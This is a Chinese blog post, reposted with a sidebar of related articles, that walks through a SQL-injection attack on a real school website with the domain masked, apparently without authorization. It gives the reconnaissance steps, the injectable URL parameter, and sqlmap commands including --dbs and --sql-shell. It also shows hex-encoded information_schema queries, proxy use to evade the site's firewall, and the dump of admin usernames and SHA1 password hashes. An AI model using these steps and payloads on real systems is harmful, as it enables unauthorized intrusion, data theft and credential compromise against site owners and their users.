实战系列之你真的会mysql注入么?

在某论坛看到一个小朋友说要检测他母校,顺手翻了下那个站点,测试了下刚好可以为公众号写一篇关于sqlmap和mysql注入的文章。

虽然是一篇关于sql注入的文章,但是还是有必要说一下踩点。作为一名渗透师必须要养成的习惯。

首先是whois:

接着是同服务器网站查询。

接着是服务器信息的收集:

端口扫描,这里用国外一个黑客用python写的:

开启了21, 80

习惯性的输入robots.txt。无果。

输入 /admin,哈哈。这下指纹识别都省下了。sitestar,漏洞wooyun大大地有,不要和我说关了,:)有方法。

目录扫描暂且搁置,因为不清楚有无WAF,先看有没有注入点,是否有XSS存在。

发现:

http://www.****.com/index.php?_m=mod_product&_a=prdlist&cap_id=306

在id值前加负号。

说明此处可控。存在注入点。

那么尝试简单的手工注入,发现未能成功执行sql语句。比较懒,就丢进sqlmap里面。

sqlmap.py -u http://www.****/index.php?_m=mod_article&_a=fullist&caa_id=35

这里是显示基于布尔型的盲注,继续往下走。

又提示可能是基于时间的盲注?

真是奇葩,继续往下。

sqlmap.py -u"http://www.****/index.php?_m=mod_article&_a=fullist&caa_id=35"–dbs

爆出数据库的名字:

直接使用 - -sql-shell,形成一个sql交互shell

然后,版本知道了,select database();发现不是root,那么就不用select user();了。

因为用户名一般是root@localhost。不是root就是xxx@localhost。当然不在交互的shell中你也可直接用 --current-user 。那么不是root就无法into outfile。乖乖破解表名列名吧。

表名:SELECTgroup_concat(table_name) from information_schema.tables wheretable_schema=0x68646D313034303435385F6462

ss_admin_menu_categories ss_admin_menu_items ss_admin_shortcuts ss_article_categories ss_articles ss_background_musics ss_backups ss_bulletins ss_delivery_addresses ss_delivery_methods ss_download_categories ss_downloads ss_emails ss_friendlinks ss_languages ss_marquees ss_menu_items ss_menus ss_messages ss_module_blocks ss_navigations ss_online_orderr ss_online_qqs ss_onlinepay_histories ss_order_products ss_parameters ss_payment_accounts ss_payment_providers ss_product_categories ss_product_pics ss_products ss_roles ss_site_infos ss_static_contents ss_template_categories ss_templates ss_third_accounts ss_transactions ss_user_extends ss_user_fields ss_user_oauths ss_users

列名:select group_concat(column_name)from information_schema.columns where table_name=0x73735F7573657273

og_time,lastlog_ip,rstpwdreq_time,rstpwdreq_rkey,active,s_role,wizard,mobile,member_verify,nickname,gender,birthday,country,city,addr1,addr2,zdpcode,telephone

在跑表的过程中又发现有防火墙,就用代理跑。不然IP会被服务器拉黑

--proxy"http://127.0.0.1:1080"

我在本地开shadowsocks,所以端口是1080。

发现确实是基于布尔也基于时间的,因为很慢。。--time-sec=10

最后,用selectlogin,passwd from ss_users limit 0,2;跑出密码和用户。

发现不是MD5,而是sha1。。。

登录乃是后话,以及要提的,有时候注入多dump出敏感的字段,因为看下图...

原文发布于微信公众号 - 晨星先生(MoXuanIT)

原文发表时间:2016-11-15

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏何俊林

Android支付实践(三)之银联支付功能(客户端+服务端)

前言:由于支付宝和微信支付都须要提供这个那个的认证材料,对于个人开发者想尝试,确实有不少麻烦,今天介绍的银联支付,对于个人开发者,可以说是福音了。来自chent...

99480
来自专栏FreeBuf

一次入侵应急响应分析

本文是前段时间处理某用户被黑的分析总结,用户被黑的表现是使用爬虫访问用户网站的首页时会出现博彩关键字,而使用正常浏览器访问时无相关的博彩关键词。这是典型的黑帽S...

22820
来自专栏haifeiWu与他朋友们的专栏

线上 Elasticsearch 集群健康值 red 状态问题排查与解决

之前一直运行正常的数据分析平台,最近一段时间没有注意发现日志索引数据一直未生成,大概持续了n多天,当前状态: 单台机器, Elasticsearch(下面称ES...

1.6K20
来自专栏黑白安全

Fuxi-Scanner-伏羲安全扫描工具

7.AWVS(Acunetix Web Vulnerability Scanner) 接口调用

43530
来自专栏信安之路

网络安全渗透测试

针对网络的渗透测试项目一般包括:信息收集、端口扫描、指纹识别、漏洞扫描、绘制网络拓扑、识别代理、记录结果等。下面就一一介绍。

23300
来自专栏FreeBuf

XSS的原理分析与解剖:第三章(技巧篇)

作者 Black-Hole 0×01 前言: 关于前两节url: 第一章:http://www.freebuf.com/articles/web/40520....

21070
来自专栏Thinks

你的第一个渐进式网站应用(5)

渐进式网站应用会很快启动并马上可用。在目前的状态中(step-04),我们的天气app启动很快,但是不可用。因为还木有数据。 我们要使用一个AJAX请求去获取数...

9030
来自专栏数据和云

匪夷所思:罕见的 Oracle 全局事务锁等待事件分析

杨廷琨,云和恩墨CTO,Oracle ACED,ITPUB Oracle 数据库管理版版主 ,人称"杨长老”,十数年如一日坚持进行Oracle技术研究与写作,号...

19910
来自专栏NetCore

Catalog Service - 解析微软微服务架构eShopOnContainers(三)

上一篇我们说了Identity Service,因为其基于IdentityServer4开发的,所以知识点不是很多,今天我们来看下Catalog Service...

31980
来自专栏蓝天

C/C++编程可用的Linux自带工具

GNU Binary Utilities或binutils是一整套的编程语言工具程序,用来处理许多格式的目标文件。当前的版本原本由在Cygnus Soluti...

14520

扫码关注云+社区

领取腾讯云代金券